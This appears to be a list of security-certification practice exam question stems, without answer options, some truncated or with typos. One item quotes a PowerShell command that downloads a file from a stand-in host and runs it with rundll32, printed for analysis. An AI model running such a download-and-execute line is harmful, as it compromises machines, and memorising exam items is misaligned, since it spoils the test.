63. A business received a small grant to migrate its infrastructure to an off-premises solution.

Which of the following should be considered first?





2. Which of the following is used to add extra complexity before using a one-way data transformation
algorithm?





245. A company wants to enable BYOD for checking email and reviewing documents. Many of the documents contain sensitive organizational information.

Which of the following should be deployed first before allowing the use of personal devices to access company data?





221. Physical access to the organization's servers in the data center requires entry and exit through multiple access points: a lobby, an access control vestibule, three doors leading to the server floor itself and eventually to a caged area solely for the organization's hardware.

Which of the following controls is described in this scenario?





95. A company is planning to set up a SIEM system and assign an analyst to review the logs on a weekly basis.

Which of the following types of controls is the company setting up?





64. A systems administrator set up a perimeter firewall but continues to notice suspicious connections between internal endpoints.

Which of the following should be set up in order to mitigate the threat posed by the suspicious activity?





35. A company is expanding its threat surface program and allowing individuals to security test the company's internet-facing application. The company will compensate researchers based on the vulnerabilities discovered.

Which of the following best describes the program the company is setting up?





97. A security operations center determines that the malicious activity detected on a server is normal.

Which of the following activities describes the act of ignoring detected activity in the future?





140. Malware spread across a company's network after an employee visited a compromised industry blog.

Which of the following best describes this type of attack?





29. A security administrator would like to protect data on employees laptops.

Which of the following encryption techniques should the security administrator use?





139. A company's marketing department collects, modifies, and stores sensitive customer data. The infrastructure team is responsible for securing the data while in transit and at rest. Which of the following data roles describes the customer?The infrastructure team is responsible for securing the data while in transit and at rest. Which of the following data roles describes the customer?





174. One of a company's vendors sent an analyst a security bulletin that recommends a BIOS update.

Which of the following vulnerability types is being addressed by the patch?





176. A security team suspects that the cause of recent power consumption overloads is the unauthorized use of empty power outlets in the network rack.

Which of the following options will mitigate this issue without compromising the number of outlets available?





94. The management team notices that new accounts that are set up manually do not always have
correct access or permissions. Which of the following automation techniques should a systems administrator use to streamline account creation?





134. A systems administrator is working on a solution with the following requirements:

- Provide a secure zone.

- Enforce a company-wide access control policy.

- Reduce the scope of threats.

Which of the following is the systems administrator setting up?





318. The new Chief Information Security Officer at a company has asked the security learn to
implement stronger user account policies. The new policies require:

-Users to choose a password unique to their last ten passwords
-Users to not log in from certain high-risk countries. 

Which of the following should the security team implement? (Select two).







223. A user's laptop constantly disconnects from the Wi-Fi network. Once the laptop reconnects, the user can reach the internet but cannot access shared folders or other network resources.

Which of the following types of attacks is the user MOST likely experiencing?





269. While researching a data exfiltration event, the security team discovers that a large amount of data was transferred to a file storage site on the internet.

Which of the following controls would work best to reduce the risk of further exfiltration using this method?





67. A hacker gained access to a system via a phishing attempt that was a direct result of a user clicking a suspicious link. The link laterally deployed ransomware, which laid dormant for multiple weeks, across the network.

Which of the following would have mitigated the spread?





306. While reviewing the /etc/shadow file, a security administrator notices files with the same values.

Which of the following attacks should the administrator be concerned about?





116. An administrator finds that all user workstations and servers are displaying a message that is associated with files containing an extension of .ryk.

Which of the following types of infections is present on the systems?





231. An employee received an email with an unusual file attachment named "Updates.ink". A security
analysts reverse engineering what the fle does and finds that executes the folowing script:


C:\Windows \System32\WindowsPowerShell\vl.0\powershell.exe -URI
https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe
$env:TEMP\autoupdate.dll


Which of the following BEST describes what the analyst 





215. A Chief Information Security Officer (CISO) is evaluating the dangers involved in deploying a new ERP system for the company. The CISO categorizes the system, selects the controls that apply to the system, implements the controls, and then assesses the success of the controls before authorizing the system.

Which of the following is the CISO using to evaluate the environment for this new ERP system?





280. A company recently enhanced mobile device configuration by implementing a set of security controls: biometrics, context-aware authentication, and full device encryption. Even with these settings in place, an unattended phone was used by a malicious actor to access corporate data.

Which of the following additional controls should be put in place first?





292. After installing a patch On a security appliance. an organization realized a massive data exfiltration occurred.

Which Of the following describes the incident?





183. As part of annual audit requirements, the security team performed a review of exceptions to the
company policy that allows specific users the ability to use USB storage devices on their laptops
The review yielded the following results.

-The exception process and policy have been correctly followed by the majority of users. 

- A small number of users did not create tickets for the requests but were granted access

- All access had been approved by supervisors.

-Valid requests for the access sporadically occurred across multiple departments.

- Access, in most cases, had not been removed when it was no longer needed.

Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable time frame?





38. Employees in the research and development business unit receive extensive training to ensure they understand how to best protect company data.

Which of the following is the type of data these employees are most likely to use in day-to-day work activities?





285. Which of the following can be used to detect a hacker who is stealing company data over port 80?





257. A company is launching a website in a different country in order to capture user information that a marketing business can use. The company itself will not be using the information.

Which of the following roles is the company assuming?





23. During a security incident, the security operations team identified sustained network traffic from a
malicious IP address: 10.1.4.9. A security analyst is creating an inbound firewall rule to block the IP address from
accessing the organization?s network.

Which of the following fulfills this request?





91. An organization recently updated its security policy to include the following statement: Regular expressions are included in source code to remove special characters such as $, |, ;. &, `, and ? from variables set by forms in a web application.

Which of the following best explains the security technique the organization adopted by making this addition to the policy?





315. Which of the following best describes the situation where a successfully onboarded employee who is using a fingerprint reader is denied access at the company's mam gate?





112. An administrator discovers that some files on a database server were recently encrypted. The administrator sees from the security logs that the data was last accessed by a domain user.

Which of the following best describes the type of attack that occurred?





136. Which of the following is the phase in the incident response process when a security analyst reviews roles and responsibilities?





52. Which of the following risk management strategies should an enterprise adopt first if a legacy application is critical to business operations and there are preventative controls that are not yet implemented?





110. A security manager created new documentation to use in response to various types of security
incidents. Which of the following is the next step the manager should take?





182. Which of the following BEST describes the team that acts as a referee during a penetration-testing
exercise?






190. An organization's Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data, including ensuring backups are properly maintained.

Which of the following roles would MOST likely include these responsibilities?






323. An organization recently released a zero-trust policy that will enforce who is able to remotely access certain data. Authenticated users who access the data must have a need to know, depending on their level of permissions.

Which of the following is the first step the organization should take when implementing the policy?





303. A junior human resources administrator was gathering data about employees to submit to a new company awards program. The employee data included job title business phone number location first initial with last name and race Which of the following best describes this type of information?





277. Which of the following incident response phases should the proper collection of the detected 'ocs and establishment of a chain of custody be performed before?





124. After a security incident, a systems administrator asks the company to buy a NAC platform.

Which of the following attack surfaces is the systems administrator trying to protect?





1. Which of the following threat actors is the most likely to be hired by a foreign government to attack
critical systems located in other countries?





159. A newly identified network access vulnerability has been found in the OS of legacy loT devices.

Which of the following would best mitigate this vulnerability quickly?





316. A company that provides an online streaming service made its customers' personal data including names and email addresses publicly available in a cloud storage service. As a result, the company experienced an increase m the number of requests to delete user accounts.

Which of the following best describes the consequence of tins data disclosure?





68. A security engineer is implementing FDE for all laptops in an organization. Which of the following are the most important for the engineer to consider as part of the planning process? (Select two).







278. Which of the following measures the average time that equipment will operate before it breaks?





18 A security analyst is reviewing the following logs:

Which of the following attacks is most likely occurring?





130. Which of the following are cases in which an engineer should recommend the decommissioning of a network device? (Select two).







32. Which of the following is the most likely to be used to document risks, responsible parties, and thresholds?





20. An engineer needs to find a solution that creates an added layer of security by preventing unauthorized access to internal company resources.

Which of the following would be the best solution?





88. Which of the following allows for the attribution of messages to individuals?





111. Users at a company are reporting they are unable to access the URL for a new retail website because it is flagged as gambling and is being blocked. Which of the following changes would allow users to access the site?





138. Which of the following would be the best ways to ensure only authorized personnel can access a secure facility? (Select two).







253. A security administrator installed a new web server. The administrator did this to increase the capacity for an application due to resource exhaustion on another server.

Which of the following algorithms should the administrator use to split the number of the connections on each server in half?





184. Which of the following is a physical security control that ensures only the authorized user is present when gaining access to a secured area?





4. An enterprise is trying to limit outbound DNS traffic originating from its internal network. Outbound DNS requests will only be allowed from one device with the IP address 10.50.10.25.

Which of the following firewall ACLs will accomplish this goal?





13 Which of the following provides the details about the terms of a test with a third-party penetration
tester?